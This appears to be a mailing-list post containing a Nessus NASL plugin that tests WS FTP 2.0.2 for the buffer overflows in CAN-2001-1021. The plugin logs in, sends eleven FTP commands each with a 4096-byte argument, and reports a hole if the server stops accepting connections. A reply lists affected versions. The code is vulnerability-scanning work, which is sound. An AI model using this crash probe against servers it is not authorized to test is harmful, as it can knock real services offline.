
WS FTP overflows
WS FTP 2.0.2 is vulnerable to buffer overflows in many commands.
This script should probably be merged with a couple of others so that we
have a generic overflow test for any FTP command.

TBD: add banner matching & "safe checks". If anybody has a WS FTP
server...





# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#

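if(description)
{
# No plugin id had been assigned when this draft was posted; left as in the original.
#script_id(11094);
script_version ("$Revision$");
# Candidate-era (CAN-) identifier as used at the time; confirm the current
# CVE form of the same number before publishing.
script_cve_id("CAN-2001-1021");
name["english"] = "WS FTP overflows";

script_name(english:name["english"]);

# Report text. What the test actually proves is that the daemon stopped
# accepting connections after a command with an oversized argument; code
# execution is a possible consequence of the same flaw, not something this
# script demonstrates.
desc["english"] = "It was possible to shut down the remote
FTP server by issuing a command followed by a too long argument.

An attacker may use this flaw to prevent your site from
sharing some resources with the rest of the world, or even
execute arbitrary code on your system.

Solution : upgrade your FTP server to the latest version.

Risk factor : High";


desc["francais"] = "Il s'est avéré possible de tuer
le serveur FTP distant en envoyant une commande
suivie d'un argument trop long.

Un pirate peut utiliser cette faille pour empêcher votre site de
partager des ressources avec le reste du monde, ou même exécuter
du code arbitraire sur votre système.

Solution : mettez à jour votre serveur FTP.

Facteur de risque : Elevé";


script_description(english:desc["english"], francais:desc["francais"]);

summary["english"] = "Attempts a buffer overflow on many commands";
summary["francais"] = "Essaye un débordement sur diverses commandes";
script_summary(english:summary["english"], francais:summary["francais"]);

# The probe can crash a vulnerable daemon and does nothing at all under
# safe checks (the script exits before connecting), so a denial-of-service
# or destructive category may describe it better than ACT_MIXED_ATTACK.
# Left for the maintainer to decide.
script_category(ACT_MIXED_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
# Presumably: find_service fills Services/ftp, ftp_anonymous provides
# ftp/login, and the banner plugin would feed a future safe-checks version.
script_dependencie("find_service.nes", "ftp_anonymous.nasl",
"ftpserver_detect_type_nd_version.nasl");
# Without a usable login most of the tested commands cannot be reached,
# so the plugin is only scheduled when one is known.
script_require_keys("ftp/login");
script_require_ports("Services/ftp", 21);

exit(0);
}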

#

# Intrusive test only: there is no banner match yet, so under safe checks
# there is nothing that can be reported without risking the daemon.
# TBD: check banners and report on version alone when safe checks are on.
if (safe_checks()) exit(0);

port = get_kb_item("Services/ftp");
if (! port) port = 21;
if (! get_port_state(port)) exit(0);

# Account used for the session; fall back to an anonymous login when the
# knowledge base provides nothing better.
login = get_kb_item("ftp/login");
if (! login) login = "ftp";
password = get_kb_item("ftp/password");
if (! password) password = "test@nessus.org";

soc = open_sock_tcp(port);
if (! soc) exit(0);

# Give up quietly when we cannot authenticate: no session, no test.
logged_in = ftp_log_in(socket:soc, user:login, pass:password);
if (! logged_in)
{
  close(soc);
  exit(0);
}

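# Commands that take a path argument; each one is sent with an oversized
# argument. CAN-2001-1021 lists overflows in these commands for WS FTP 2.0.2.
cmd[0] = "DELE";
cmd[1] = "MDTM";
cmd[2] = "MLST";
cmd[3] = "MKD";
cmd[4] = "RMD";
cmd[5] = "RNFR";
cmd[6] = "RNTO";
cmd[7] = "SIZE";
cmd[8] = "STAT";
cmd[9] = "XMKD";
cmd[10] = "XRMD";   # no trailing space: the separator is added when the line is built
ncmd = 11;          # keep in step with the table above

for (i = 0; i < ncmd; i = i + 1)
{
  # Oversized path argument. Whatever the server answers is read and
  # discarded: the signal we look for is whether the daemon is still there.
  s = string(cmd[i], " /", crap(4096), "\r\n");
  send(socket:soc, data:s);
  recv_line(socket:soc, length:1024);

  # End this session politely so that a connection we dropped ourselves is
  # never mistaken for a crashed daemon.
  send(socket:soc, data:string("QUIT\r\n"));
  recv_line(socket:soc, length:1024);
  close(soc);

  # Liveness probe: can a fresh session be opened? A single refused
  # connection (per-client connection limit, daemon still restarting) is
  # not proof of a crash, so retry once before reporting a hole.
  sleep(1);
  soc = open_sock_tcp(port);
  if (! soc)
  {
    sleep(2);
    soc = open_sock_tcp(port);
    if (! soc) { security_hole(port); exit(0); }
  }

  # The remaining commands need an authenticated session. The server is
  # clearly up if we got this far, so a failed login means we cannot
  # conclude anything: stop quietly rather than send the rest unauthenticated.
  if (! ftp_log_in(socket:soc, user:login, pass:password))
  {
    close(soc);
    exit(0);
  }
}

# Every command survived: close the last session cleanly.
send(socket:soc, data:string("QUIT\r\n"));
recv_line(socket:soc, length:1024);
close(soc);

# The original draft also counted empty replies ('pb') as a weaker finding
# but never enabled it -- rightly so: an empty or missing reply is not
# evidence of a crash and would only produce false security_warning()s.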
Re: WS FTP overflows
Here is my plugin for the WS_FTP CPWD buffer overflow (the plugin itself is not reproduced on this archive page).

Vulnerable versions: 3.1.1, 3.1, 3.0.1, 3.0, 2.0.4, and 1.0.5.

-Forrest

On Tuesday 20 August 2002 18:05, Michel Arboi wrote:
> WS FTP 2.0.2 is vulnerable to buffer overflow on many commands.
> This script should probably be merged with a couple of others so that
> we have a generic overflow test on any FTP command.
>
> TBD: add banner matching & "safe checks". If anybody has a WS FTP
> server...